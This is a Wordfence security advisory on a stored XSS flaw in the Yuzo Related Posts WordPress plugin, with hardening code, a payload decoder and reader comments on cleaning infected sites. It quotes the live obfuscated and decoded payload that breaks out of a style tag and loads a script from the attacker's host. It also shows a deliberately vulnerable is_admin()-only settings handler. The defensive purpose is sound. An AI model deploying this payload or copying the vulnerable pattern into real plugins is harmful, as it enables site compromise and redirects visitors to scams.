Wordfence Blog

Yuzo Related Posts Zero-Day Vulnerability Exploited in the Wild

This entry was posted in Vulnerabilities, WordPress Security on April 10, 2019 by Dan Moen.

The Yuzo Related Posts plugin, which is installed on over 60,000 websites, was removed from the WordPress.org plugin directory on March 30, 2019 after an unpatched vulnerability was publicly, and irresponsibly, disclosed by a security researcher that same day. The vulnerability, which allows stored cross-site scripting (XSS), is now being exploited in the wild. These attacks appear to be linked to the same threat actor who targeted the recent Social Warfare and Easy WP SMTP vulnerabilities.

The XSS protection included in the Wordfence firewall protects against the exploit attempts we have seen so far. Both free and Premium Wordfence users are protected against these attacks. Based on a deeper analysis of the security flaws present in the plugin we have also deployed protection against additional attack vectors. Premium customers will receive the update today, free users in 30 days. We recommend that all users remove the plugin from their sites immediately.

is_admin() Strikes Again

The vulnerability in Yuzo Related Posts stems from missing authentication checks in the plugin routines responsible for storing settings in the database. The code below from assets/ilenframework/core.php is the crux of the problem.

    function __construct(){
        if( ! is_admin() ){ // only front-end
            self::set_main_variable();
            return;
        }elseif( is_admin() ){ // only admin
            // set default if not exists
            self::_ini_();
            // ... this branch goes on to call self::save_options() (not shown)
        }
    }

Developers often mistakenly use is_admin() to check whether a piece of code that requires administrative privileges should run, but as the WordPress documentation points out, that isn’t what the function does: it only reports whether the current request is for an admin-area URL, and says nothing about who is making it. In this scenario self::_ini_() is called on any request to an administrative interface page, including /wp-admin/options-general.php and /wp-admin/admin-post.php, which allows a POST request to those pages, authenticated or not, to be processed by self::save_options() later in the code.

The result is that an unauthenticated attacker can inject malicious content, such as a JavaScript payload, into the plugin settings. That payload is then inserted into HTML templates and executed by the web browser when users visit the compromised website. This security issue could be used to deface websites, redirect visitors to unsafe websites, or compromise WordPress administrator accounts, among other things.
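As an added example (not the plugin's code and not Wordfence's), here is the settings-save flow the article describes written the vulnerable way and the hardened way side by side. The option name yuzo_related_post_css_and_style is the one the article names; the hook name, nonce action, page slug and function names are assumptions chosen for the example, and only one half would exist in a real plugin.

```php
<?php
/*
 * Added example, not the plugin's code: the settings-save flow from the
 * article written the vulnerable way and the hardened way. The option name
 * is the one the article names; the hook name, nonce action, page slug and
 * function names are assumptions chosen for this example. Only one half
 * would exist in a real plugin; both are shown here for comparison.
 */

// --- Vulnerable: gated on is_admin() alone ---------------------------------
// is_admin() answers "is this an admin-area URL?", not "is the caller an
// administrator?". It returns true for an anonymous POST to
// /wp-admin/admin-post.php, so the option can be written by anyone.
function vuln_init() {
    if ( is_admin() && isset( $_POST['yuzo_related_post_css_and_style'] ) ) {
        // No capability check, no nonce, no sanitisation: raw HTML is stored.
        update_option( 'yuzo_related_post_css_and_style',
            wp_unslash( $_POST['yuzo_related_post_css_and_style'] ) );
    }
}
add_action( 'init', 'vuln_init' );

function vuln_print_css() {
    // The stored value is echoed verbatim inside <style>: a value that starts
    // with </style><script> breaks out and runs in every visitor's browser.
    echo '<style>' . get_option( 'yuzo_related_post_css_and_style', '' ) . '</style>';
}
add_action( 'wp_head', 'vuln_print_css' );

// --- Hardened: capability + nonce + sanitise on write, strip on read -------
// admin_post_{action} fires only for logged-in users (the nopriv variant is
// deliberately not registered), and the handler re-checks authorisation itself.
add_action( 'admin_post_yuzo_save_settings', 'hardened_save_options' );

function hardened_save_options() {
    // 1. Authorisation: is this user allowed to change site settings?
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to change these settings.', 'example' ), 403 );
    }
    // 2. CSRF: did the request originate from our own settings form?
    check_admin_referer( 'yuzo_save_settings', '_yuzo_nonce' );

    // 3. Input: the option is supposed to hold CSS, so markup is dropped.
    //    wp_strip_all_tags() also removes <script>/<style> blocks with their
    //    contents, which neutralises the </style><script> breakout as a second
    //    line of defence; the real fix is steps 1 and 2.
    $raw = ( isset( $_POST['yuzo_related_post_css_and_style'] )
             && is_string( $_POST['yuzo_related_post_css_and_style'] ) )
        ? wp_unslash( $_POST['yuzo_related_post_css_and_style'] )
        : '';
    update_option( 'yuzo_related_post_css_and_style', wp_strip_all_tags( $raw ) );

    wp_safe_redirect( admin_url( 'options-general.php?page=yuzo-settings&updated=1' ) );
    exit;
}

function hardened_print_css() {
    // 4. Output: do not trust the stored value either; strip again when printing.
    $css = get_option( 'yuzo_related_post_css_and_style', '' );
    echo '<style id="yuzo-custom-css">' . wp_strip_all_tags( $css ) . '</style>';
}
add_action( 'wp_head', 'hardened_print_css' );

// The settings form the hardened handler expects: action + nonce fields.
function hardened_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="yuzo_save_settings">
        <?php wp_nonce_field( 'yuzo_save_settings', '_yuzo_nonce' ); ?>
        <textarea name="yuzo_related_post_css_and_style"><?php
            echo esc_textarea( get_option( 'yuzo_related_post_css_and_style', '' ) );
        ?></textarea>
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}
```

The two checks that matter are current_user_can() and check_admin_referer(); they answer "who is asking" and "did they mean to", which is_admin() never does. Stripping tags on both write and read is defence in depth for the case where some other path writes the option.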

Exploits Lead to Malicious Redirects

Today, eleven days after this vulnerability was irresponsibly disclosed and a proof-of-concept (PoC) was published, threat actors have begun exploiting sites with Yuzo Related Posts installed.

Exploits currently seen in the wild inject malicious JavaScript into the yuzo_related_post_css_and_style option value.

</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>

Once deobfuscated, it’s easier to see what the script is doing:

</style><script language=javascript>var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.async = true;
elem.src = 'https://hellofromhony[.]org/counter';
document.getElementsByTagName('head')[0].appendChild(elem);</script>

When a user visits a compromised website containing the above payload, the injected script loads a second-stage script from the attacker's host, and the visitor is redirected to malicious tech support scam pages. Example: [screenshot omitted]
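The String.fromCharCode()/eval() wrapping shown above can be undone mechanically, and the same routine doubles as a check over stored option values during clean-up (the option should contain nothing but CSS). The scanner below is an added example, not code from the article or from Wordfence. Its inputs are constructed for the example: the first reuses only the opening statement of the payload quoted above (which decodes, in two passes, to var dd = 'script';), the second uses the reserved .invalid domain, and all function names are chosen here.

```php
<?php
/*
 * Added example, not part of the article: decode the String.fromCharCode()/
 * eval() obfuscation seen in the attack and flag wp_options values that
 * should hold CSS but contain markup. Samples are constructed for the example.
 */

/** Replace every String.fromCharCode(n, n, ...) with the JS string literal it builds. */
function decode_from_char_code( string $js ): string {
    return preg_replace_callback(
        '/String\.fromCharCode\(\s*([\d\s,]+?)\s*\)/',
        function ( array $m ): string {
            $text = '';
            foreach ( explode( ',', $m[1] ) as $code ) {
                if ( '' === trim( $code ) ) {
                    continue;
                }
                $code  = (int) trim( $code );
                // Payloads seen so far are ASCII; larger code points go through mb_chr.
                $text .= $code < 128 ? chr( $code ) : mb_chr( $code, 'UTF-8' );
            }
            // Emit as a single-quoted JS literal so the result stays valid JS.
            return "'" . str_replace( array( '\\', "'" ), array( '\\\\', "\\'" ), $text ) . "'";
        },
        $js
    );
}

/** Replace eval('<literal>') with the literal's contents so inner calls can be decoded. */
function unwrap_eval_literal( string $js ): string {
    return preg_replace_callback(
        '/eval\(\'((?:[^\'\\\\]|\\\\.)*)\'\)/',
        function ( array $m ): string {
            return preg_replace( '/\\\\(.)/', '$1', $m[1] ); // undo \' and \\ escapes
        },
        $js
    );
}

/** Iterate decode + unwrap until nothing changes (the payload nests two layers). */
function deobfuscate_js( string $js, int $max_passes = 10 ): string {
    for ( $i = 0; $i < $max_passes; $i++ ) {
        $next = unwrap_eval_literal( decode_from_char_code( $js ) );
        if ( $next === $js ) {
            break;
        }
        $js = $next;
    }
    return $js;
}

/** Heuristics for a value that is supposed to contain only CSS. */
function inspect_css_option( string $value ): array {
    $lower   = strtolower( $value );
    $decoded = deobfuscate_js( $value );
    preg_match_all( '#https?://[^\s\'"<>]+#', $decoded, $urls );
    return array(
        'closes_style_tag' => false !== strpos( $lower, '</style' ),
        'has_script_tag'   => false !== strpos( $lower, '<script' ),
        'uses_eval'        => false !== strpos( $lower, 'eval(' ),
        'external_src'     => array_values( array_unique( $urls[0] ) ),
        'decoded'          => $decoded,
    );
}

// Constructed samples (see the lead-in for provenance).
$samples = array(
    'page_payload_prefix' => '</style><script language=javascript>eval(String.fromCharCode('
        . '118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, '
        . '102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, '
        . '57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, '
        . '49, 49, 54, 41, 59))</script>',
    'loader_with_src'     => "</style><script>var e=document.createElement('script');"
        . "e.src='https://malicious.invalid/counter';document.head.appendChild(e);</script>",
    'benign_css'          => '.yuzo_related_post { color: #333; }',
);

foreach ( $samples as $name => $value ) {
    $r       = inspect_css_option( $value );
    $flagged = $r['closes_style_tag'] || $r['has_script_tag'] || $r['uses_eval'];
    printf( "%-20s %s\n", $name, $flagged ? 'SUSPICIOUS' : 'ok' );
    if ( $flagged ) {
        printf( "  decoded: %s\n  urls: %s\n", $r['decoded'], implode( ', ', $r['external_src'] ) );
    }
}
```

Run it with php scanner.php. In an actual clean-up the values to feed it are the rows from SELECT option_value FROM wp_options WHERE option_name = 'yuzo_related_post_css_and_style', which is the same database check suggested in the comments below; the decoder is deliberately a text rewrite and never executes the script it decodes.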

Three Vulnerabilities with a Lot in Common

Our analysis shows that the attempts to exploit this vulnerability share a number of commonalities with attacks on two other vulnerabilities discovered in other plugins: Social Warfare and Easy WP SMTP.

Exploits so far have used a malicious script hosted on hellofromhony[.]org, which resolves to 176.123.9[.]53. That same IP address was used in the Social Warfare and Easy WP SMTP campaigns. In addition, all three campaigns involved exploitation of stored XSS injection vulnerabilities and have deployed malicious redirects. We are confident that the tactics, techniques and procedures (TTPs) in all three attacks point to a common threat actor.

Conclusion

As was the case a few weeks ago, the irresponsible actions of a security researcher have resulted in a zero-day plugin vulnerability being exploited in the wild. Cases like this underscore the importance of a layered security approach which includes a WordPress firewall.

Site owners running the Yuzo Related Posts plugin are urged to remove it from their sites immediately, at least until a fix has been published by the author. Wordfence Premium customers and free users have been protected against the current attacks we’re seeing in the wild. An additional firewall rule to protect against alternate exploits has been developed and deployed to our Premium customers today and will be available to free users in 30 days.


30 Comments on "Yuzo Related Posts Zero-Day Vulnerability Exploited in the Wild"

Carin Bosman April 10, 2019 at 1:05 pm

Thanks for keeping us posted!
Something similar happened to me on Monday - it was a different plugin, but the result was the same - I lost my admin privileges, and half my site is currently down... (one of two plugins, I still can't figure out which one, but they were the only two plugins I installed on that day)

Mike Polek April 10, 2019 at 1:48 pm

Given how often the misunderstanding around is_admin() causes problems similar to this, perhaps it's time to rename the function is_admin_page(), or something else which clearly indicates that the function is not related to the privileges of the caller.

Biswajit April 10, 2019 at 2:21 pm

This can also be checked by the current_user_can function.

Tran Thao April 10, 2019 at 4:52 pm

My site used it and was redirected all. I had to delete it yesterday.

Muskie April 11, 2019 at 11:08 am

I too switched to this plugin from YARPP and this morning discovered I could not access my blog. Luckily I was logged in, in another tab and was able to find a WordPress forum thread or two and fix this. But related post plugins seem to be particularly problematic. Supposedly JetPack has this feature now but I'm thinking of just not having this feature on my blog anymore.

HL Carpenter April 10, 2019 at 6:01 pm

Thank you for all you do, Wordfence. Had forgotten this was the plugin on our site because the name on the plugin list didn't include Yuzo. But there it was...and now it's gone.

Martin April 11, 2019 at 1:28 am

Will deactivating the plugin until it is patched protect from the exploit?

Dan Moen April 11, 2019 at 8:27 am

We recommend that you remove it from your site immediately.

Eddie April 11, 2019 at 1:57 am

Thank you for this. I was a victim as well and unfortunately installed Wordfence only after this.

Could this have been prevented if I had Wordfence installed before?

Dan Moen April 11, 2019 at 8:16 am

The Wordfence firewall would have blocked the attacks we're seeing in the wild, yes.

Han April 11, 2019 at 3:36 am

Thanks for the update. Unfortunately on one of my websites Wordfence broke probably due to an update and it was injected by this Yuzo Related Posts attack. Any chance to repair this? Or restore a complete backup?

Kathy Zant April 12, 2019 at 10:10 am

Restoring from a recent backup can definitely get you back on your feet. We also have a security services team that can assist. https://www.wordfence.com/wordfence-site-cleanings/

Tom April 11, 2019 at 5:33 am

I am not a plugin developer, but I use !is_admin() conditionals in functions.php to dequeue scripts/styles which I don't need in the front-end, for example jQuery. Is this usage of !is_admin() safe or not?

Kathy Zant April 12, 2019 at 2:08 pm

This would be fine. Definitely review the WordPress documentation when using any core function.

Sam April 11, 2019 at 11:46 am

Hello,

I installed WordFence and did not have this plugin, yet it happened. I had the latest WordFence installed.

How does this happen?

Thank you for any help. I don't mind paying for the help to make sure it doesn't happen.

Kathy Zant April 12, 2019 at 10:12 am

I'm sorry to hear you're having issues with your site. If you did not have the Yuzo Related Posts plugin installed, it's unlikely that this was what had happened. If you need a security team to take a look at your site and investigate, please check with our Security Services Team. https://www.wordfence.com/wordfence-site-cleanings/

Ederson April 11, 2019 at 12:43 pm

My page was infected; I have Wordfence installed but I do not know what happened. I cannot enter the WordPress admin panel because it is redirected to another hellofromhony page.
I would like to know how we can clean our website of this malware?
NOTE: the page that I put in the website field is not the one that is infected.

Thanks in advance for your collaboration.

Kathy Zant April 12, 2019 at 10:31 am

Hi Ederson, I'm sorry to learn your site is redirecting. If you have a recent backup, you could restore from it and remove the Yuzo Related Posts plugin to remove the vulnerability. You may be able to investigate if it's simply a change in your database using PhpMyAdmin if you have that set up in your hosting account. If you need help, our Security Services Team can help. https://www.wordfence.com/wordfence-site-cleanings/ Or you can review this guide for cleaning a hacked site. https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

John April 11, 2019 at 7:36 pm

I noticed an unknown user created on my site with an administrator role attached; could this be a result of this?

Kathy Zant April 12, 2019 at 10:38 am

Hi John, compromising administrator accounts is one method of exploiting the vulnerabilities within Yuzo Related Posts.

Saim Rasheed April 11, 2019 at 11:46 pm

Hello, my website has been hacked and affected yesterday. When I access my website it redirects to [https://]hellofromhony[.]com/go.php?temp=5&/

Also I can't access my wp login.php

How does this happen??? Please help me

Kathy Zant April 12, 2019 at 10:42 am

Hi Saim, I'm sorry to hear you're having issues. You can restore from a recent backup and remove the Yuzo Related Posts plugin, or follow this guide for cleaning your hacked site. https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/ If you need help beyond that, our Security Services Team can assist. https://www.wordfence.com/wordfence-site-cleanings/

Giang Lê Hoàng April 12, 2019 at 9:13 am

Hi,

Is there any way in settings (.htaccess...) that could help us survive a zero-day attack (like this one or Yellow Pencil)?

Thanks!

Kathy Zant April 12, 2019 at 10:45 am

If you don't have Wordfence Premium with updated firewall rules to protect you, we recommend removing the vulnerable plugins until they have been patched.

Chris April 12, 2019 at 11:26 am

I've spent maybe a total of 24 hours over the last three days figuring out why my sites kept being redirected to scam sites. Every time I restored my site, about 10 hours later the hack returned. Then I accidentally found this page. Thanks a lot! I hope that the hacking of my sites will now stop. Next step -> get Wordfence Premium!!

Sanusi Abdur Razaq April 13, 2019 at 2:28 am

Thanks for the rare work and updates.

Edwin April 14, 2019 at 9:46 am

Very well, I followed some guides about how to clean it but still I had problems... until I figured out that I have to clear the cache too.

L Chandana April 17, 2019 at 10:31 am

My site was hacked and redirected to ad sites.
It was a big problem for me;
after completely removing the site, I restored it from a backup.
Now the site is on, but I didn't know the reason was this plugin;
after a few days I found this article.

The same thing happened to my site as described in this article.

Carolynne April 21, 2019 at 9:06 am

Does anyone know of an alternative to this related posts plugin?

Kathy Zant April 22, 2019 at 1:35 pm

There are quite a few related posts plugins available in the repository: https://wordpress.org/plugins/search/related+posts/
